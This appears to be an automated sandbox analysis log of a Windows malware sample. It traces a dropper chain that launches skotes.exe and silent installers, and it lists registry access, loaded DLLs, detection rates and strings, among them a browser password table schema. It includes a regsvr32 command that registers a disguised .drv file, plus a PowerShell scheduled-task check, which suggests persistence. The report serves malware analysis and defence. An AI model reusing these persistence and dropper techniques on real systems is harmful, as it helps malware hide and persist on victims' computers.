Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Users\user\Desktop\p199AjsEFs.exe File created: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\p199AjsEFs.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: p199AjsEFs.exe, 00000000.00000003.2184176730.00000000055FD000.00000004.00000800.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2204742298.000000000561A000.00000004.00000800.00020000.00000000.sdmp, p199AjsEFs.exe, 00000000.00000003.2184014722.000000000561A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: crossplatformplayer.exe, 0000000E.00000003.3318112266.00000000007C4000.00000004.00000020.00020000.00000000.sdmp, crossplatformplayer.exe, 0000000E.00000002.3416693931.000000006096F000.00000002.00000001.01000000.00000012.sdmp, sqlite3.dll.14.dr, is-DFNTB.tmp.13.dr Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: p199AjsEFs.exe Virustotal: Detection: 72%
Source: p199AjsEFs.exe ReversingLabs: Detection: 79%
Source: HT94GNC6NP3AGR6EM8I9D3647.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\p199AjsEFs.exe File read: C:\Users\user\Desktop\p199AjsEFs.exe
Source: unknown Process created: C:\Users\user\Desktop\p199AjsEFs.exe "C:\Users\user\Desktop\p199AjsEFs.exe"
Source: C:\Users\user\Desktop\p199AjsEFs.exe Process created: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe "C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe"
Source: C:\Users\user\Desktop\p199AjsEFs.exe Process created: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe "C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe"
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe "C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe "C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe"
Source: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe Process created: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp "C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp" /SL5="$10023C,3422545,56832,C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe"
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Process created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe "C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe" -i
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe "C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe"
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Process created: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp "C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp" /SL5="$403E8,1104885,161792,C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe"
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Process created: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe "C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Process created: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp "C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp" /SL5="$203F4,1104885,161792,C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: webio.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: textshaping.dll Jump to behavior
